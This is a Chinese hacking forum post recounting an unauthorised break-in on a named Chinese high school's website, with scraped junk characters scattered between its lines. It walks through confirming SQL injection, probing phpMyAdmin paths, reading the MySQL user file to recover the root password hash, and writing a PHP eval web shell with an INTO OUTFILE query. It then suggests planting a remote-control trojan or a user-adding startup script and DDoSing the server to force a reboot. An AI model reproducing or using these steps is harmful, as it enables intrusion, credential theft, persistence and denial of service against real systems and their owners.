友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
; m1 B' B  u/ y2 j发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！
; T2 d9 ?4 d# R# _


& d; b0 {4 t- g; ~$ c1 f常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限

) }/ a4 N: P5 _& V那么想可以直接写入shell ，getshell有几个条件：

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF
7 P9 {" H- v; s' W7 X; {4 o
' |- q5 i( Q6 ?5 V; y6 s) S7 h& F! K试着爆绝对路径：
) a, m+ H$ S5 m# [) `1./phpMyAdmin/index.php?lang[]=1  
2./phpMyAdmin/phpinfo.php  
! |8 c& `6 J. H9 B7 j8 R1 v3./load_file()  
7 ]/ `& W' U4 \" `4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
5./phpmyadmin/libraries/select_lang.lib.php  
6./phpmyadmin/libraries/lect_lang.lib.php  
7./phpmyadmin/libraries/mcrypt.lib.php   
& @/ e/ \: f" E7 N6 z- k0 ~8./phpmyadmin/libraries/export/xls.php  
0 K- c. y/ E( b9 A
' @, L0 ?9 w0 G/ i均不行...........................

御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php

权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin

9 j$ E7 k' `7 T( p. }  I( @% j默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败

敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........

) j2 f) _8 G' E: o2 q想想root还可以读，读到root密码进phpmyadmin 也可以拿shell

http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
1 X+ }3 y2 [/ {4 D
自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD

成功读到root密码：
6 g# M$ K& h0 K& j) F+ _; ~; C1 M
17---- r(0072)
18---- o(006f)
19---- o(006f)
* P7 {7 S1 X; r. V& f20---- t(0074)
21---- *(002a)
4 s  S7 t- V# u& A% s) R# X22---- 8(0038)
* V2 p# f' C0 ^7 W, A: U23---- 2(0032)
. v0 f8 s: w* E  M4 r7 P7 g24---- E(0045)
25---- 1(0031)
% b( u' X& Q. e7 s  e26---- C(0043)
; }1 T5 @: Z9 v% R1 l27---- 5(0035)
28---- 8(0038)
29---- 2(0032)
' T0 @; a6 _% \8 _30---- 8(0038)
- y. k3 y) Q* H( Y31---- A(0041)
/ h  q% f" g/ o' p32---- 9(0039)
+ m7 z, I/ n% b1 a1 F33---- B(0042)
" |: A7 m5 D1 m& ^! y& d# t34---- 5(0035)
/ [7 }0 t/ R5 M, m0 v35---- 4(0034)
36---- 8(0038)
0 Q  k7 p) ^& S8 R37---- 6(0036)
9 d& U; ^' d- N6 _! g& }' s38---- 4(0034)
39---- 9(0039)
40---- 1(0031)
41---- 1(0031)
42---- 5(0035)
9 q* I: u$ c. H: Q) k43---- 3(0033)
44---- 5(0035)
45---- 9(0039)
5 t! z2 \! ~7 g  n: h46---- 8(0038)
47---- F(0046)
3 \! a# [/ @2 _48---- F(0046)
( A) G- N7 C9 m- ~) ^+ ]49---- 4(0034)
50---- F(0046)
7 R" u& g5 o" y6 T* w51---- 0(0030)
52---- 3(0033)
# i: X4 k: J1 I53---- 2(0032)
: O9 _* z9 k, ~& z2 B: H54---- A(0041)
* \2 l# w% C( N% x( I+ Z55---- 4(0034)
7 g7 W" z1 Q$ F, y56---- A(0041)
57---- B(0042)
58---- *(0044)
( y" @. n6 u+ I% p9 T59---- *(0035)
  e' L. D5 T. M. F60---- *(0041)
; ?( S8 i$ ?" F61---- *0032)
+ F- u9 r) |0 |0 [3 f' T% ]% i! }
解密后成功登陆phpmyamin
9 D& B6 X% |. E% x" A' q. `7 Q1 U! k                          

                             

找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
2 q  @. J. _: U0 }9 E! K: V) c
9 X. C( @/ n- {. ~$ u4 |6 i成功执行，拿下shell，菜刀连接：
, {- d( v8 i1 ~) ~( ?' Q0 I; q
  L6 o& O9 @; t服务器不支持asp,aspx,php提权无果...................

# s. O4 \& t: j* M8 E3 \但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：
% Q+ u+ c8 o. x, P8 e

服务器上已经有个隐藏帐号了

4 G6 U& F: H/ L5 S( w$ T

别名     administrators
4 {5 f4 f  C; W5 z注释     管理员对计算机/域有不受限制的完全访问权

成员

/ h: @. t; ~* K

-------------------------------------------------------------------------------
/ p' Q- Z) L$ O9 Jadmin
Administrator
2 G  c* T, p% ]# n4 h: g' u, g; {4 aslipper$
sqluser
* U4 t7 G8 @) ^) g命令成功完成。

服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。

ddos服务器重启，不然就只能坐等服务器重启了...............................

      

angel